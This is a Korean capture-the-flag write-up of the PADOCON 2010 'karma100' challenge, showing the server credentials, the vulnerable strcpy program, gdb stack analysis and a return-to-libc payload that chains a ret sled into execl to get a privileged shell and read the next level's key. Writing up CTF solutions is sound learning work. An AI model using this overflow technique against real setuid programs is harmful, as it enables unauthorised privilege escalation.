PADOCON 2010 CTF가 끝나고 system 문제를 못푼게 한이 되어 공부하고 나서 다시 풀어 기록을 남깁니다.
Subject : karma100
Type : exploitme
Examiner : padocon
Point : 400
ssh ip : 168.188.130.218
id : karma100
pw : 0x1738a731
먼저 접속을 하여 문제 서버의 환경을 확인해 보도록 하겠습니다.
[karma100@padocon ~]$ python -c "import os ; print os.uname()"
('Linux', 'padocon', '2.6.31.5-127.fc12.i686', '#1 SMP Sat Nov 7 21:41:45 EST 2009', 'i686')
[karma100@padocon ~]$ cat /etc/fedora-release
Fedora release 12 (Constantine)
[karma100@padocon ~]$ sysctl -a | grep random
error: permission denied on key 'kernel.cad_pid'
kernel.random.poolsize = 4096
kernel.random.entropy_avail = 163
kernel.random.read_wakeup_threshold = 64
kernel.random.write_wakeup_threshold = 128
kernel.random.boot_id = 2811c7d8-a576-46a4-9e09-b46481d0ad2b
kernel.random.uuid = e51db0f5-58ed-4bb3-8a82-c0166a3bd649
kernel.randomize_va_space = 2
[karma100@padocon ~]$ sysctl -a | grep exec
error: permission denied on key 'kernel.cad_pid'
kernel.exec-shield = 1
kernel.core_pattern = |/usr/libexec/hookCCpp /var/cache/abrt %p %s %u
OS : Fedora core 12
랜덤 스택&라이브러리 : X
비실행스택 : O
문제 코드는 아래와 같습니다.
#include <stdio.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
char buf[4];
strcpy( buf, argv[1] );
return 0;
}
비실행 스택이므로 RTL 기법을 이용하여 공격을 하여야 합니다. 공격방법은 ret를 이용하여 execl() 함수를 실행시켜 쉘을 획득하는 방법 입니다.
참고문서 : http://x82.inetcop.org/h0me/papers/FC_exploit/FC4_local_overflow.txt
먼저 execl() 함수의 주소를 확인 합니다.
[karma100@padocon ~]$ gdb -q exploitme
Reading symbols from /home/karma100/exploitme...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x80483ca
(gdb) r
Starting program: /home/karma100/exploitme
Breakpoint 1, 0x080483ca in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.11.1-1.i686
(gdb) x/x execl
0x850330 <execl>: 0x53565755
(gdb)
execl() 함수의 주소는 0x00850330 이군요. 이제 ret 주소 및 argv 주소를 확인해 보도록 하겠습니다.
[karma100@padocon ~]$ gdb -q exploitme
Reading symbols from /home/karma100/exploitme...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>: push %ebp
0x080483c5 <main+1>: mov %esp,%ebp
0x080483c7 <main+3>: sub $0xc,%esp
0x080483ca <main+6>: mov 0xc(%ebp),%eax
0x080483cd <main+9>: add $0x4,%eax
0x080483d0 <main+12>: mov (%eax),%eax
0x080483d2 <main+14>: mov %eax,0x4(%esp)
0x080483d6 <main+18>: lea -0x4(%ebp),%eax
0x080483d9 <main+21>: mov %eax,(%esp)
0x080483dc <main+24>: call 0x80482f4 <strcpy@plt>
0x080483e1 <main+29>: mov $0x0,%eax
0x080483e6 <main+34>: leave
0x080483e7 <main+35>: ret
End of assembler dump.
(gdb) b *main+29
Breakpoint 1 at 0x80483e1
(gdb) r AAAABBBBCCCC
Starting program: /home/karma100/exploitme AAAABBBBCCCC
Breakpoint 1, 0x080483e1 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.11.1-1.i686
(gdb) x/32wx $ebp
0xbff29438: 0x42424242 0x43434343 0x00000000 0xbff294e4
0xbff29448: 0xbff294f0 0xb78163d0 0x08048310 0xffffffff
0xbff29458: 0x007b0fc4 0x0804822c 0x00000001 0xbff294a0
0xbff29468: 0x007a0365 0x007b1a98 0xb78166a8 0x00924ff4
0xbff29478: 0x00000000 0x00000000 0xbff294b8 0xf20e82f1
0xbff29488: 0xee70f58e 0x00000000 0x00000000 0x00000000
0xbff29498: 0x00000002 0x08048310 0x00000000 0x007a6630
0xbff294a8: 0x007caadb 0x007b0fc4 0x00000002 0x08048310
(gdb) x/32wx 0xbff294e4
0xbff294e4: 0xbff2a885 0xbff2a89e 0x00000000 0xbff2a8ab
0xbff294f4: 0xbff2a8bc 0xbff2a8d4 0xbff2a8e4 0xbff2a8ef
0xbff29504: 0xbff2a8fd 0xbff2a91d 0xbff2a938 0xbff2a94b
0xbff29514: 0xbff2a959 0xbff2ae40 0xbff2ae4c 0xbff2ae8e
0xbff29524: 0xbff2aeac 0xbff2aebb 0xbff2aece 0xbff2aedf
0xbff29534: 0xbff2aef8 0xbff2af01 0xbff2af18 0xbff2af4b
0xbff29544: 0xbff2af5f 0xbff2af67 0xbff2af78 0xbff2afac
0xbff29554: 0xbff2afce 0x00000000 0x00000020 0x00781414
(gdb) x/s 0xbff2a885
0xbff2a885: "/home/karma100/exploitme"
(gdb) x/s 0xbff2a89e
0xbff2a89e: "AAAABBBBCCCC"
(gdb) x/32wx $esp
0xbff2942c: 0xbff29434 0xbff2a89e 0x41414141 0x42424242
0xbff2943c: 0x43434343 0x00000000 0xbff294e4 0xbff294f0
0xbff2944c: 0xb78163d0 0x08048310 0xffffffff 0x007b0fc4
0xbff2945c: 0x0804822c 0x00000001 0xbff294a0 0x007a0365
0xbff2946c: 0x007b1a98 0xb78166a8 0x00924ff4 0x00000000
0xbff2947c: 0x00000000 0xbff294b8 0xf20e82f1 0xee70f58e
0xbff2948c: 0x00000000 0x00000000 0x00000000 0x00000002
0xbff2949c: 0x08048310 0x00000000 0x007a6630 0x007caadb
ret의 주소는 0x080483e7 이군요. 그리고 argv의 주소는 0xbff294e4 입니다.
이제 몇개의 ret를 넣어야 execl() 함수까지 다다를 수 있는지 계산해 보도록 하겠습니다.
[karma100@padocon ~]$ python -c "print (0xbff294e4-0xbff2943c)/4"
42
총 42개의 ret가 필요합니다. 이제 execl() 함수의 인자로 줄 코드를 작성 하도록 하겠습니다.
[karma100@padocon ~]$ cd tmp
[karma100@padocon tmp]$ mkdir byjjoon
[karma100@padocon tmp]$ cd byjjoon
[karma100@padocon byjjoon]$ cat > shell.c
int main()
{
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
execl("/bin/sh", "sh", 0);
}
[karma100@padocon byjjoon]$ gcc -o shell shell.c
shell.c: In function ‘main’:
shell.c:5: warning: incompatible implicit declaration of built-in function ‘execl’
[karma100@padocon byjjoon]$ ls -al
total 20
drwxrwxr-x. 2 karma100 karma100 4096 2010-02-22 09:09 .
drwx-wx---. 30 root karma100 4096 2010-02-22 09:08 ..
-rwxrwxr-x. 1 karma100 karma100 5338 2010-02-22 09:09 shell
-rw-rw-r--. 1 karma100 karma100 130 2010-02-22 09:09 shell.c
[karma100@padocon byjjoon]$
이제 공격을 해보도록 하겠습니다. Payload는 다음과 같습니다.
[AAAABBBB] + [RET * 42] + [execl()] + [인자1] + [인자2]
[karma100@padocon byjjoon]$ ../../exploitme `python -c "print 'AAAABBBB' + '\xe7\x83\x04\x08'*42 + '\x30\x03\x85\x00' + ' ./shell' + ' ./shell'"`
sh-4.0$ id
uid=505(karma100) gid=506(boom300) groups=505(karma100) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.0$ cat ../../../boom300/key
GlueMelol
sh-4.0$